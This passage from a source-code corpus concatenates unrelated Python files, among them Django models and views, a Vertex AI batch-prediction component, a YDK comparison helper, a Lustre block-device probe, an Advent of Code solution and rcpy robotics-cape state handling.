    required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormCheckboxFieldCMS(ContactFormBaseFieldCMS):
    """Checkbox field for the contact form."""

    # Value submitted when the checkbox is ticked.
    value = models.CharField(
        blank=False,
        max_length=255
    )
    # Whether the checkbox renders pre-ticked.
    checked = models.BooleanField()
@python_2_unicode_compatible
class ContactFormSubmitFieldCMS(ContactFormBaseFieldCMS):
    """Submit control for the contact form, rendered as <button> or <input>."""

    type = models.CharField(
        blank=False,
        max_length=255,
        choices=[
            ('button', 'Button'),
            ('input', 'Input')
        ]
    )
infopages/views.py | OhmGeek/TechSite | 0 | 12766841 | from django.shortcuts import render
from .models import InfoPage
# Create your views here.
def view_page(request, slug):
    """Render the :class:`InfoPage` identified by *slug*.

    Returns a 404 response when no page with that slug exists.  The
    original ``InfoPage.objects.get`` raised ``DoesNotExist``, which
    surfaced to the user as a 500 error.
    """
    # Local import keeps this fix self-contained; it would normally live
    # alongside ``render`` in the module's import block.
    from django.shortcuts import get_object_or_404

    page = get_object_or_404(InfoPage, slug=slug)
    page_data = {
        "page": page
    }
    return render(request, 'infopages/view_page.html', page_data)
| 2.15625 | 2 |
custom_components/batch_prediction_vertex.py | taocao/Continuous-Adaptation-for-Machine-Learning-System-to-Data-Changes | 15 | 12766842 | """
This component launches a Batch Prediction job on Vertex AI.
Know more about Vertex AI Batch Predictions jobs, go here:
https://cloud.google.com/vertex-ai/docs/predictions/batch-predictions.
"""
from google.cloud import storage
from tfx.dsl.component.experimental.annotations import Parameter, InputArtifact
from tfx.dsl.component.experimental.decorators import component
from tfx.types.standard_artifacts import String
import google.cloud.aiplatform as vertex_ai
from absl import logging
@component
def BatchPredictionGen(
    gcs_source: InputArtifact[String],
    project: Parameter[str],
    location: Parameter[str],
    model_resource_name: Parameter[str],
    job_display_name: Parameter[str],
    gcs_destination: Parameter[str],
    instances_format: Parameter[str] = "file-list",
    machine_type: Parameter[str] = "n1-standard-2",
    accelerator_count: Parameter[int] = 0,
    accelerator_type: Parameter[str] = None,
    starting_replica_count: Parameter[int] = 1,
    max_replica_count: Parameter[int] = 1,
):
    """Launch a synchronous Vertex AI Batch Prediction job.

    gcs_source: A location inside GCS to be used by the Batch Prediction job to get its inputs.
    The artifact's payload is read from GCS and its text content is the GCS
    path (without the ``gs://`` scheme) of the actual input file list.
    Rest of the parameters are explained here: https://git.io/JiUyU.
    """
    storage_client = storage.Client()

    # Read GCS Source (gcs_source contains the full path of GCS object).
    # 1-1. get bucketname from gcs_source
    # NOTE(review): assumes the artifact URI has the form
    # ``scheme://bucket/object/path`` -- confirm against FileListGen.
    gcs_source_uri = gcs_source.uri.split("//")[1:][0].split("/")
    bucketname = gcs_source_uri[0]
    bucket = storage_client.get_bucket(bucketname)
    logging.info(f"bucketname: {bucketname}")

    # 1-2. get object path without the bucket name.
    objectpath = "/".join(gcs_source_uri[1:])

    # 1-3. read the object to get value set by OutputArtifact from FileListGen.
    blob = bucket.blob(objectpath)
    logging.info(f"objectpath: {objectpath}")
    gcs_source = f"gs://{blob.download_as_text()}"

    # Get Model: list models with the given display name ordered by
    # update_time and take the last entry (the most recently updated).
    # Raises IndexError if no model with that display name exists.
    vertex_ai.init(project=project, location=location)
    model = vertex_ai.Model.list(
        filter=f"display_name={model_resource_name}", order_by="update_time"
    )[-1]

    # Launch a Batch Prediction job (sync=True blocks until completion).
    logging.info("Starting batch prediction job.")
    logging.info(f"GCS path where file list is: {gcs_source}")
    batch_prediction_job = model.batch_predict(
        job_display_name=job_display_name,
        instances_format=instances_format,
        gcs_source=gcs_source,
        gcs_destination_prefix=gcs_destination,
        machine_type=machine_type,
        accelerator_count=accelerator_count,
        accelerator_type=accelerator_type,
        starting_replica_count=starting_replica_count,
        max_replica_count=max_replica_count,
        sync=True,
    )
    logging.info(batch_prediction_job.display_name)
    logging.info(batch_prediction_job.resource_name)
    logging.info(batch_prediction_job.state)
| 2.5625 | 3 |
sam/datasets/__init__.py | junj2ejj/sam-textvqa | 48 | 12766843 | <reponame>junj2ejj/sam-textvqa
from .stvqa_dataset import STVQADataset
from .textvqa_dataset import TextVQADataset
# Maps a dataset key (as referenced by configs / CLI flags) to the
# dataset class that loads it.
DatasetMapTrain = {
    "textvqa": TextVQADataset,
    "stvqa": STVQADataset,
}
| 1.375 | 1 |
sdk/python/core/tests/compare.py | ygorelik/pydk | 0 | 12766844 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""compare.py
return True if attributes in entity(lhs) = entity(rhs)
"""
import logging
from enum import Enum
from ydk.types import (Empty, Decimal64, FixedBitsDict,
YList, YListItem, YLeafList)
import sys
# ``long`` was removed in Python 3; alias it to ``int`` so the
# isinstance() checks in is_builtin_type() work on both major versions.
if sys.version_info > (3,):
    long = int
# Module-level logger used by ErrorMsg.print_err().
LOGGER = logging.getLogger('ydk.tests.unittest')
LOGGER.setLevel(logging.DEBUG)
def is_builtin_type(attr):
    """Return True if *attr* is a scalar/leaf value comparable with ``==``.

    Covers Python built-ins plus the YDK-derived scalar types (all of
    which implement rich comparison), as opposed to container entities
    that must be compared attribute by attribute.
    """
    # Single isinstance call; the original listed ``int`` twice and
    # wrapped the boolean in a redundant if/else.
    return isinstance(attr, (int, bool, dict, str, long, float,
                             Enum, Empty, Decimal64, FixedBitsDict,
                             YLeafList, YListItem))
class ErrNo(Enum):
    """Mismatch categories reported by is_equal()."""
    WRONG_VALUE = 0
    WRONG_TYPES = 1
    POPULATION_FAILED = 2
    WRONG_DICT = 3
    WRONG_DICT_VALUE = 4
    WRONG_CLASS = 5


class ErrorMsg(object):
    """Formats a single comparison failure for debug logging."""

    # Headline per error category.  BUG FIX: the original if/elif chain in
    # __str__ had no branch for WRONG_DICT_VALUE, so formatting such an
    # error raised UnboundLocalError.
    _HEADLINES = {
        ErrNo.WRONG_VALUE: "Wrong value:\n",
        ErrNo.WRONG_TYPES: "Wrong types: not comparable\n",
        ErrNo.WRONG_CLASS: "Wrong types:\n",
        ErrNo.POPULATION_FAILED: "Failed population:\n",
        ErrNo.WRONG_DICT: "Wrong dict: different dictionary key\n",
        ErrNo.WRONG_DICT_VALUE: "Wrong dict: different dictionary value\n",
    }

    def __init__(self, lhs, rhs, errno):
        self.lhs = lhs
        self.rhs = rhs
        self.errno = errno

    def __str__(self):
        errtyp = self._HEADLINES[self.errno]
        errlhs = "\tlhs = %s, type: %s;\n" % (str(self.lhs), type(self.lhs))
        errrhs = "\trhs = %s, type: %s;\n" % (str(self.rhs), type(self.rhs))
        return ''.join([errtyp, errlhs, errrhs])

    def print_err(self):
        """Emit the formatted message on the module logger."""
        LOGGER.debug(str(self))
def is_equal(lhs, rhs):
    """Recursively compare two YDK entities/values for equality.

    Leaf values are compared with ``==`` (with enum-name fallback);
    lists element-by-element; entities attribute-by-attribute via
    ``__dict__``.  The first mismatch category found is logged through
    :class:`ErrorMsg` and ``False`` is returned.
    """
    ret, errtyp = True, None
    if lhs is None and rhs is None or \
            isinstance(lhs, list) and isinstance(rhs, list) and not lhs and not rhs:
        # Both unset, or both empty lists: equal by definition.
        pass
    elif is_builtin_type(lhs) or is_builtin_type(rhs):
        try:
            if lhs != rhs and not _equal_enum(lhs, rhs):
                errtyp, ret = ErrNo.WRONG_VALUE, False
        except Exception:
            errtyp, ret = ErrNo.WRONG_TYPES, False
    elif lhs is None or rhs is None:
        # Exactly one side is populated.
        errtyp, ret = ErrNo.POPULATION_FAILED, False
    elif isinstance(lhs, YList) and isinstance(rhs, YList) or \
            isinstance(lhs, list) and isinstance(rhs, list):
        if len(lhs) != len(rhs):
            errtyp, ret = ErrNo.WRONG_VALUE, False
        else:
            for left, right in zip(lhs, rhs):
                # BUG FIX: original used ``ret |= is_equal(...)`` with ret
                # starting at True, which could never become False --
                # element mismatches were silently ignored.
                ret = is_equal(left, right) and ret
    elif lhs.__class__ != rhs.__class__:
        errtyp, ret = ErrNo.WRONG_CLASS, False
    else:
        dict_lhs, dict_rhs = lhs.__dict__, rhs.__dict__
        len_lhs = len(dict_lhs)
        len_rhs = len(dict_rhs)
        # 'i_meta' is bookkeeping, not data: exclude it from the size check.
        if 'i_meta' in dict_lhs:
            len_lhs -= 1
        if 'i_meta' in dict_rhs:
            len_rhs -= 1
        if len_lhs != len_rhs:
            errtyp, ret = ErrNo.WRONG_DICT, False
        for k in dict_lhs:
            if k in ('parent', 'i_meta'):
                continue
            # BUG FIX: membership must be checked before dict_rhs[k] is
            # accessed; the original order could raise KeyError here.
            if k not in dict_rhs:
                errtyp, ret = ErrNo.WRONG_DICT, False
            elif is_builtin_type(dict_lhs[k]) or is_builtin_type(dict_rhs[k]):
                try:
                    if dict_lhs[k] != dict_rhs[k] and not _equal_enum(dict_lhs[k], dict_rhs[k]):
                        # Surface the offending leaf values in the log.
                        lhs = dict_lhs[k]
                        rhs = dict_rhs[k]
                        errtyp, ret = ErrNo.WRONG_VALUE, False
                except Exception:
                    errtyp, ret = ErrNo.WRONG_TYPES, False
            elif not is_equal(dict_lhs[k], dict_rhs[k]):
                ret = False
    if ret is False and errtyp is not None:
        # BUG FIX: original passed (rhs, lhs), swapping the lhs/rhs labels
        # in the logged message.
        err_msg = ErrorMsg(lhs, rhs, errtyp)
        err_msg.print_err()
    return ret
def _equal_enum(rhs, lhs):
return all((isinstance(rhs, Enum),
isinstance(lhs, Enum),
rhs.name == lhs.name))
| 2.0625 | 2 |
iml_common/blockdevices/blockdevice_linux.py | intel-hpdd/iml-common | 1 | 12766845 | <reponame>intel-hpdd/iml-common
# Copyright (c) 2018 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.
import re
import os
import subprocess
from collections import defaultdict
from tempfile import mktemp
from blockdevice import BlockDevice
from ..lib.shell import Shell
class BlockDeviceLinux(BlockDevice):
    """ldiskfs/ext-backed Lustre block device.

    Probes block devices with ``blkid``, ``debugfs``, ``llog_reader`` and
    ``tunefs.lustre`` to discover filesystems and Lustre targets.
    """

    _supported_device_types = ["linux"]
    # Matches Lustre target labels such as "testfs-MDT0000" / "testfs-OST0001".
    TARGET_NAME_REGEX = "([\w-]+)-(MDT|OST)\w+"

    def __init__(self, device_type, device_path):
        super(BlockDeviceLinux, self).__init__(device_type, device_path)

    def _check_module(self):
        """Raise Shell.CommandExecutionError if the ldiskfs module is not loaded."""
        Shell.try_run(["/usr/sbin/udevadm", "info", "--path=/module/ldiskfs"])

    @property
    def filesystem_type(self):
        """
        Verify if filesystem exists at self._device_path and return type
        :return: type if exists, None otherwise
        """
        occupying_fs = self._blkid_value("TYPE")
        return occupying_fs

    @property
    def filesystem_info(self):
        """
        Verify if filesystem exists at self._device_path and return message
        :return: message indicating type if exists, None otherwise
        """
        occupying_fs = self._blkid_value("TYPE")
        return None if occupying_fs is None else "Filesystem found: type '%s'" % occupying_fs

    @property
    def uuid(self):
        """Filesystem UUID as reported by blkid, or None if absent."""
        return self._blkid_value("UUID")

    def _blkid_value(self, value):
        """Return a single blkid tag (*value*) for this device, or None.

        Raises RuntimeError on unexpected blkid exit codes.
        """
        result = Shell.run(["blkid", "-p", "-o", "value", "-s", value, self._device_path])
        if result.rc == 2:
            # blkid returns 2 if there is no filesystem on the device
            return None
        elif result.rc == 0:
            result = result.stdout.strip()
            if result:
                return result
            else:
                # Empty filesystem: blkid returns 0 but prints no FS if it seems something non-filesystem-like
                # like an MBR
                return None
        else:
            raise RuntimeError(
                "Unexpected return code %s from blkid %s: '%s' '%s'"
                % (result.rc, self._device_path, result.stdout, result.stderr)
            )

    @property
    def preferred_fstype(self):
        """Backing filesystem type used when formatting Lustre targets."""
        return "ldiskfs"

    def mgs_targets(self, log):
        """
        If there is an MGS in the local targets, use debugfs to get a list of targets.
        Return a dict of filesystem->(list of targets)
        """
        result = defaultdict(lambda: [])
        try:
            self._check_module()
        except Shell.CommandExecutionError:
            log.info("ldiskfs is not loaded, skipping device MGS/filesystem detection")
            return result
        log.info("Searching Lustre logs for filesystems")
        ls = Shell.try_run(["debugfs", "-c", "-R", "ls -l CONFIGS/", self._device_path])
        filesystems = []
        targets = []
        for line in ls.split("\n"):
            try:
                # Column 9 of `debugfs ls -l` output is the entry name;
                # short/blank lines raise IndexError and are skipped.
                name = line.split()[8]
                match = re.search("([\w-]+)-client", name)
                if match is not None:
                    log.info("Found a filesystem of name %s" % match.group(1).__str__())
                    filesystems.append(match.group(1).__str__())
                match = re.search(self.TARGET_NAME_REGEX, name)
                if match is not None:
                    log.info("Found a target of name %s" % match.group(0).__str__())
                    targets.append(match.group(0).__str__())
            except IndexError:
                pass
        # Read config log "<fsname>-client" for each filesystem
        for fs in filesystems:
            self._read_log("filesystem", fs, "%s-client" % fs, result, log)
            self._read_log("filesystem", fs, "%s-param" % fs, result, log)
        # Read config logs "testfs-MDT0000" etc
        for target in targets:
            self._read_log("target", target, target, result, log)
        return result

    def _read_log(self, conf_param_type, conf_param_name, log_name, result, log):
        # NB: would use NamedTemporaryFile if we didn't support python 2.4
        """
        Uses debugfs to parse information about the filesystem on a device. Return any mgs info
        and config parameters about that device.

        The reality is that nothing makes use of the conf_params anymore but the code existed and this routine
        is unchanged from before 2.0 so I have left conf_params in.

        :param conf_param_type: The type of configuration parameter to store
        :type conf_param_type: str
        :param conf_param_name: The name of the configuration parameter to store
        :type conf_param_name: str
        :param log_name: Name of the config log to dump (e.g. "testfs-client")
        :type log_name: str
        :param result: dict of fsname -> list of target dicts, appended to in place
        :type result: dict
        :param log: logger used for progress/info messages

        Returns: None; discovered targets are appended to ``result``.
        """
        tmpfile = mktemp()
        log.info("Reading log for %s:%s from log %s" % (conf_param_type, conf_param_name, log_name))
        try:
            Shell.try_run(["debugfs", "-c", "-R", "dump CONFIGS/%s %s" % (log_name, tmpfile), self._device_path])
            if not os.path.exists(tmpfile) or os.path.getsize(tmpfile) == 0:
                # debugfs returns 0 whether it succeeds or not, find out whether
                # dump worked by looking for output file of some length. (LU-632)
                return
            client_log = subprocess.Popen(["llog_reader", tmpfile], stdout=subprocess.PIPE).stdout.read()
            entries = client_log.split("\n#")[1:]
            for entry in entries:
                tokens = entry.split()
                # ([\w=]+) covers all possible token[0] from
                # lustre/utils/llog_reader.c @ 0f8dca08a4f68cba82c2c822998ecc309d3b7aaf
                (code, action) = re.search("^\\((\d+)\\)([\w=]+)$", tokens[1]).groups()
                if conf_param_type == "filesystem" and action == "setup":
                    # e.g. entry="#09 (144)setup 0:flintfs-MDT0000-mdc 1:flintfs-MDT0000_UUID 2:192.168.122.105@tcp"
                    label = re.search("0:([\w-]+)-\w+", tokens[2]).group(1)
                    fs_name = label.rsplit("-", 1)[0]
                    uuid = re.search("1:(.*)", tokens[3]).group(1)
                    nid = re.search("2:(.*)", tokens[4]).group(1)
                    log.info("Found log entry for uuid %s, label %s, nid %s" % (uuid, label, nid))
                    result[fs_name].append({"uuid": uuid, "name": label, "nid": nid})
                elif action == "param" or (action == "SKIP" and tokens[2] == "param"):
                    # A "SKIP" record marks a cleared parameter.
                    if action == "SKIP":
                        clear = True
                        tokens = tokens[1:]
                    else:
                        clear = False
                    # e.g. entry="#29 (112)param 0:flintfs-client 1:llite.max_cached_mb=247.9"
                    # has conf_param name "flintfs.llite.max_cached_mb"
                    object = tokens[2][2:]
                    if len(object) == 0:
                        # e.g. "0: 1:sys.at_max=1200" in an OST log: it is a systemwide
                        # setting
                        param_type = conf_param_type
                        param_name = conf_param_name
                    elif re.search(self.TARGET_NAME_REGEX, object):
                        # Identify target params
                        param_type = "target"
                        param_name = re.search(self.TARGET_NAME_REGEX, object).group(0)
                    else:
                        # Fall through here for things like 0:testfs-llite, 0:testfs-clilov
                        param_type = conf_param_type
                        param_name = conf_param_name
                    if tokens[3][2:].find("=") != -1:
                        key, val = tokens[3][2:].split("=")
                    else:
                        key = tokens[3][2:]
                        val = True
                    if clear:
                        val = None
                    log.info("Found conf param %s:%s:%s of %s" % (param_type, param_name, key, val))
                    # 2.2 don't save the conf params because nothing reads them and zfs doesn't seem to produce them
                    # so keep the code - but just don't store.
                    # This change is being made on the FF date hence the caution.
                    # self.conf_params[param_type][param_name][key] = val
        finally:
            # Always remove the debugfs dump file.
            if os.path.exists(tmpfile):
                os.unlink(tmpfile)

    def targets(self, uuid_name_to_target, device, log):
        """Probe *device* with tunefs.lustre and return its Lustre target names/params.

        NOTE(review): ``TargetsInfo`` and ``lustre_property_delimiters`` are
        not defined in this class -- presumably inherited from BlockDevice;
        confirm in the base module.
        """
        try:
            self._check_module()
        except Shell.CommandExecutionError:
            log.info("ldiskfs is not loaded, skipping device %s" % device["path"])
            return self.TargetsInfo([], None)
        log.info(
            "Searching device %s of type %s, uuid %s for a Lustre filesystem"
            % (device["path"], device["type"], device["uuid"])
        )
        result = Shell.run(["tunefs.lustre", "--dryrun", device["path"]])
        if result.rc != 0:
            log.info("Device %s did not have a Lustre filesystem on it" % device["path"])
            return self.TargetsInfo([], None)
        # For a Lustre block device, extract name and params
        # ==================================================
        name = re.search("Target:\\s+(.*)\n", result.stdout).group(1)
        flags = int(re.search("Flags:\\s+(0x[a-fA-F0-9]+)\n", result.stdout).group(1), 16)
        params_re = re.search("Parameters:\\ ([^\n]+)\n", result.stdout)
        if params_re:
            # Dictionary of parameter name to list of instance values
            params = defaultdict(list)
            # FIXME: naive parse: can these lines be quoted/escaped/have spaces?
            for lustre_property, value in [t.split("=") for t in params_re.group(1).split()]:
                params[lustre_property].extend(
                    re.split(BlockDeviceLinux.lustre_property_delimiters[lustre_property], value)
                )
        else:
            params = {}
        if name.find("ffff") != -1:
            # A name containing a kernel pointer means the target was never registered.
            log.info("Device %s reported an unregistered lustre target and so will not be reported" % device["path"])
            return self.TargetsInfo([], None)
        if flags & 0x0005 == 0x0005:
            # For combined MGS/MDT volumes, synthesise an 'MGS'
            names = ["MGS", name]
        else:
            names = [name]
        return self.TargetsInfo(names, params)
| 2.15625 | 2 |
py/pv.py | wulffern/aic2022 | 0 | 12766846 | #!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt

# Unit prefix used to convert A -> mA and W -> mW for plotting.
m = 1e-3

# Sweep the load current from 10 uA to 1 mA.
# (A dead `np.logspace(-5, -3)` assignment that was immediately overwritten
# has been removed.)
i_load = np.linspace(1e-5, 1e-3, 200)

# Ideal-diode solar-cell model: saturation current, photocurrent, and the
# thermal voltage kT/q at T = 300 K.
i_s = 1e-12
i_ph = 1e-3
V_T = 1.38e-23*300/1.6e-19

# Diode voltage for the photocurrent left over after the load draws i_load:
# V_D = V_T * ln((i_ph - i_load)/i_s + 1)
V_D = V_T*np.log((i_ph - i_load)/(i_s) + 1)

# Power delivered to the load.
P_load = V_D*i_load

plt.subplot(2,1,1)
plt.plot(i_load/m,V_D)
plt.ylabel("Diode voltage [V]")
plt.grid()

plt.subplot(2,1,2)
plt.plot(i_load/m,P_load/m)
plt.xlabel("Current load [mA]")
plt.ylabel("Power Load [mW]")
plt.grid()

plt.savefig("pv.pdf")
plt.show()
| 2.578125 | 3 |
python/gameinfo.py | pason-systems/battle-tanks-client-stubs | 2 | 12766847 | <reponame>pason-systems/battle-tanks-client-stubs
class GameInfo(object):
    """Holds player/team information for the current game session."""

    def __init__(self, team_name, match_token, team_password, client_token=''):
        """Store the credentials identifying this client in a match.

        Args:
            team_name: display name of the team.
            match_token: token identifying the match to join.
            team_password: password authenticating the team.
            client_token: optional token assigned to this client
                (empty string until one is issued).
        """
        self.client_token = client_token
        self.team_name = team_name
        self.match_token = match_token
        # Fixed: the source contained a broken '<PASSWORD>_password'
        # redaction placeholder instead of the parameter name.
        self.team_password = team_password
ntcli.py | ALMSIVI/novel_tools | 1 | 12766848 | import argparse
from pathlib import Path
from novel_tools.toolkit import analyze, docgen
from novel_tools.utils import get_config
def do_analyze(args):
    """Run the selected toolkit's analysis on the input file or directory."""
    config_name = args.toolkit + '_config.json'
    source = Path(args.input)
    destination = None if args.output is None else Path(args.output)

    if source.is_file():
        # Single file: the toolkit config is expected next to it.
        analyze(get_config(config_name, source.parent),
                filename=source, out_dir=destination)
    else:
        # Directory input: the config lives inside the directory itself.
        analyze(get_config(config_name, source),
                in_dir=source, out_dir=destination)
def start():
    """Build the Novel Tools argument parser, parse argv, and dispatch."""
    parser = argparse.ArgumentParser(description='Novel Tools command line interface.')
    commands = parser.add_subparsers(help='Tools provided by this package.', dest='command', required=True)

    # Framework functions #
    analyze_cmd = commands.add_parser('analyze', description='Analyzes the novel file(s).')
    analyze_cmd.add_argument('-t', '--toolkit',
                             help='The toolkit that will be executed. Built-in toolkits include'
                                  'struct, create, split, struct_dir, and create_dir. If a custom toolkit is given, '
                                  'make sure to have <toolkit>_config.json under the input directory.')
    analyze_cmd.add_argument('-i', '--input',
                             help='Input filename or directory name. If it is a file, it will only be recognized by'
                                  ' TextReader, and it must contain the full path.')
    analyze_cmd.add_argument('-o', '--output', default=None, help='Output directory name.')
    analyze_cmd.set_defaults(func=do_analyze)

    # generate_docs
    docgen_cmd = commands.add_parser('docgen', description='Generates documentation for framework classes.')
    docgen_cmd.add_argument('-c', '--config_filename', default=None,
                            help='Filename of the config which specifies additional packages.')
    docgen_cmd.add_argument('-d', '--doc_filename', default=None, help='Filename of the output doc file.')

    def run_docgen(a):
        # Named equivalent of the original lambda dispatcher.
        return docgen(a.config_filename, a.doc_filename)

    docgen_cmd.set_defaults(func=run_docgen)

    args = parser.parse_args()
    args.func(args)
# Allow running this module directly as a script.
if __name__ == '__main__':
    start()
| 2.796875 | 3 |
2020/09/day9.py | jscpeterson/advent-of-code-2020 | 0 | 12766849 | from itertools import combinations
def get_data(filepath):
    """Read one integer per line from *filepath* and return them as a list.

    Uses a context manager so the file handle is always closed; the original
    `open(filepath).readlines()` leaked the handle.
    """
    with open(filepath) as f:
        return [int(line) for line in f]
def solve1(filepath, preamble):
    """Return the first number that is not the sum of two of the *preamble*
    numbers immediately before it.

    Bug fix: the original used ``if i <= preamble: continue``, which skipped
    index ``preamble`` itself — the very first number that should have been
    validated against its preamble window.
    """
    inputs = get_data(filepath)
    for i, value in enumerate(inputs):
        if i < preamble:
            # Still inside the preamble; nothing to validate yet.
            continue
        window = inputs[i - preamble:i]
        sums = set(a + b for a, b in combinations(window, 2))
        if value not in sums:
            return value
def solve2(filepath, preamble):
    """Find a contiguous run of at least two numbers summing to solve1's
    answer, and return min(run) + max(run).

    Bug fixes vs. the original: the inner index was relative to the slice
    ``inputs[i:]`` but used as an absolute slice bound in ``inputs[i:i2]``,
    so the examined windows were misaligned — windows ending near the end of
    the list were never tried, and a single-element window could match.
    """
    target = solve1(filepath, preamble)
    inputs = get_data(filepath)
    for start in range(len(inputs)):
        total = 0
        for end in range(start, len(inputs)):
            total += inputs[end]
            # Require a run of length >= 2 (end > start).
            if total == target and end > start:
                window = inputs[start:end + 1]
                return min(window) + max(window)
            if total >= target:
                # All inputs are positive, so extending can only overshoot.
                break
# Smoke checks against the puzzle's sample ('test') and real ('input') files.
# NOTE(review): these run on import and require both files in the CWD;
# consider moving them under an `if __name__ == '__main__':` guard.
assert solve1('test', 5) == 127
print('Part 1: %d' % solve1('input', 25))
assert solve2('test', 5) == 62
print('Part 2: %s' % solve2('input', 25))
| 3.15625 | 3 |
rcpy/__init__.py | BrendanSimon/rcpy | 0 | 12766850 | import warnings
import signal
import sys, os, time
from rcpy._rcpy import initialize, cleanup, get_state
from rcpy._rcpy import set_state as _set_state
from rcpy._rcpy import cleanup as _cleanup
#from hanging_threads import start_monitoring
#monitoring_thread = start_monitoring()
# State-machine constants passed to set_state() / returned by get_state().
IDLE = 0
RUNNING = 1
PAUSED = 2
EXITING = 3

# Registry of open (read_fd, write_fd) pairs used to broadcast state changes.
_RC_STATE_PIPE_LIST = []
def _get_state_pipe_list(p = _RC_STATE_PIPE_LIST):
    # Deliberate mutable-default idiom: the module-level list is bound once at
    # definition time, so every caller shares the same pipe registry.
    return p
# creates pipes for communication
def create_pipe():
    """Open a new OS pipe, register it for state broadcasts, and return it
    as a (read_fd, write_fd) tuple."""
    pipe = os.pipe()
    _get_state_pipe_list().append(pipe)
    return pipe
def destroy_pipe(pipe):
    """Deregister *pipe* from the broadcast list and close both of its
    file descriptors (read end first, then write end)."""
    _get_state_pipe_list().remove(pipe)
    for fd in pipe:
        os.close(fd)
# set state
def set_state(state):
    """Write *state* to every registered notification pipe, then forward it
    to the robotics-cape C extension."""
    payload = bytes(str(state), 'UTF-8')
    for _read_fd, write_fd in _get_state_pipe_list():
        os.write(write_fd, payload)
    _set_state(state)
# cleanup() bookkeeping
_CLEANUP_FLAG = False  # guards cleanup() against running more than once
_cleanup_functions = {}  # user callback -> tuple of positional args (see add_cleanup)
def add_cleanup(fun, pars):
    """Register *fun* to be invoked as ``fun(*pars)`` during cleanup()."""
    # Item assignment mutates the module-level dict in place, so the
    # original's `global` declaration was unnecessary.
    _cleanup_functions[fun] = pars
def cleanup():
    """Run registered cleanup callbacks, shut down the cape, close pipes.

    Idempotent: only the first call does any work; later calls return
    immediately.
    """
    global _CLEANUP_FLAG

    # Return early to avoid multiple calls to cleanup.
    if _CLEANUP_FLAG:
        return
    _CLEANUP_FLAG = True
    print('Initiating cleanup...')

    # Call the user-registered cleanup functions first.
    for fun, pars in _cleanup_functions.items():
        fun(*pars)

    # Report any state-notification pipes still open.
    pipes = _get_state_pipe_list()
    if len(pipes):
        print('{} pipes open'.format(len(pipes)))

    # Broadcast EXITING so pipe readers can react before shutdown.
    set_state(EXITING)

    print('Calling roboticscape cleanup')
    # Call the robotics cape C-extension cleanup.
    _cleanup()

    if len(pipes):
        print('Closing pipes')

    # Close remaining pipes; destroy_pipe() removes each entry from the list,
    # which is why this loop pops index 0 until the list is empty.
    while len(pipes):
        destroy_pipe(pipes[0])

    print('Done with cleanup')  # fixed typo: was 'Dnoe with cleanup'
# idle function
def idle():
    """Transition the state machine to IDLE."""
    set_state(IDLE)
# run function
def run():
    """Transition the state machine to RUNNING."""
    set_state(RUNNING)
# pause function
def pause():
    """Transition the state machine to PAUSED."""
    set_state(PAUSED)
# exit function (note: intentionally shadows the builtin within this module)
def exit():
    """Transition the state machine to EXITING."""
    set_state(EXITING)
# cleanup handler for SIGINT/SIGTERM (installed at module import below)
def handler(signum, frame):
    """Signal handler: run cleanup once, then raise KeyboardInterrupt.

    Args:
        signum: number of the delivered signal.
        frame: interrupted stack frame (unused).
    """
    # Report which signal triggered us.
    warnings.warn('Signal handler called with signal {}'.format(signum))
    # Run the full rcpy cleanup now.
    cleanup()
    # cleanup() already ran, so drop the atexit registration made at import.
    atexit.unregister(cleanup)
    warnings.warn('> Robotics cape exited cleanly')
    # Surface the interruption to the running program.
    raise KeyboardInterrupt()
# Initialize the cape hardware via the C extension (runs at import time).
initialize()

# Start in PAUSED; user code calls run() when ready.
set_state(PAUSED)
warnings.warn('> Robotics cape initialized')

# make sure it is disabled when exiting cleanly
import atexit; atexit.register(cleanup)

# Signal handling is opt-out via the RCPY_NO_HANDLERS environment variable.
if 'RCPY_NO_HANDLERS' in os.environ:
    warnings.warn('> RCPY_NO_HANDLERS is set. User is responsible for handling signals')
else:
    # install handlers so Ctrl-C / SIGTERM trigger cleanup (see handler above)
    warnings.warn('> Installing signal handlers')
    signal.signal(signal.SIGINT, handler)
    signal.signal(signal.SIGTERM, handler)